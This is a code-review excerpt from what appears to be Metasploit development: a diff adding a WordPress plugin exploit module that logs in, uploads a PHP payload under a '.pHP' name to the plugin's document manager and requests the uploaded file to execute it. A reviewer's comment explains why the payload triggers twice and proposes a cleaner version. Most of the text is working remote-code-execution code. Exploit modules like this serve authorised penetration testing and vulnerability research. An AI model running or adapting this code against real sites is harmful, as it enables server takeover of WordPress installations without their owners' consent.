modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb

```diff
@@ -0,0 +1,138 @@
+    else
+      CheckCode::Unknown('The admin credentials given are wrong !')
+    end
+  end
+
+  def get_user_id(cookie)
+    r = send_request_cgi({
+      'method' => 'GET',
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
+      'Referer' => full_uri('/wp-admin/users.php'),
+      'vars_get' => {
+        'page' => 'sp-client-document-manager-fileview'
+      }
+    })
+    fail_with(Failure::Unknown, "Target #{RHOST} could not be reached.") unless r
+    user_id = r.body.to_s.match(%r{<option value='(\d+)'>#{datastore['USERNAME']}</option>})
+    fail_with(Failure::UnexpectedReply, "Can't find user id on plugin page") unless (user_id && user_id[1])
+    user_id[1]
+  end
+
+  def exploit
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+    fail_with(Failure::UnexpectedReply, 'Authentication failed') unless cookie
+    user_id = get_user_id(cookie)
+    payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.pHP"
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part('a1b3bac1bc', nil, nil, "form-data; name='cdm_upload_file_field'")
+    post_data.add_part("/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=#{user_id}", nil, nil, "form-data; name='_wp_http_referer'")
+    post_data.add_part('exploits', nil, nil, "form-data; name='dlg-upload-name'")
+    post_data.add_part('', 'application/octet-stream', nil, "form-data; name='dlg-upload-file[]'; filename=''")
+    post_data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name='dlg-upload-file[]'; filename='#{payload_name}'")
+    post_data.add_part('', nil, nil, "form-data; name='dlg-upload-notes'")
+    post_data.add_part('Upload', nil, nil, "form-data; name='sp-cdm-community-upload'")
+
+    print_status("Uploading file \'#{payload_name}\' containing the payload...")
+
+    r = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "wp-admin/admin.php?page=sp-client-document-manager-fileview&id=#{user_id}"),
+      'headers' => {
+        'Origin' => full_uri(''),
+        'Referer' => full_uri("wp-admin/admin.php?page=sp-client-document-manager-fileview&id=#{user_id}")
+      },
+      'cookie' => cookie,
+      'data' => post_data.to_s,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    )
+
+    send_request_cgi(
+      'method' => 'GET',
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name.downcase!}")
+    )
+
+    if r&.code == 302
+
+      print_status('Triggering the payload ...')
+      send_request_cgi(
+        'method' => 'GET',
+        'cookie' => cookie,
+        'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name}")
+      )
+    else
+      fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file")
+    end
```

Comment:
It looks like this could be why your payload is being triggered twice. The first call to `send_request_cgi` is not updating the value of `r` so it's unclear on if it's necessary or not. Furthermore, the `#downcase!` is updating `payload_name` causing it to be lowercase in both of the requests, making them identical. You should be able to observe this by setting `HttpTrace` to on.

Something like this might be a bit more simple and still functional though I haven't tested it.

```suggestion
    fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 302

    print_status('Triggering the payload ...')
    send_request_cgi(
      'method' => 'GET',
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name.downcase}")
    )
```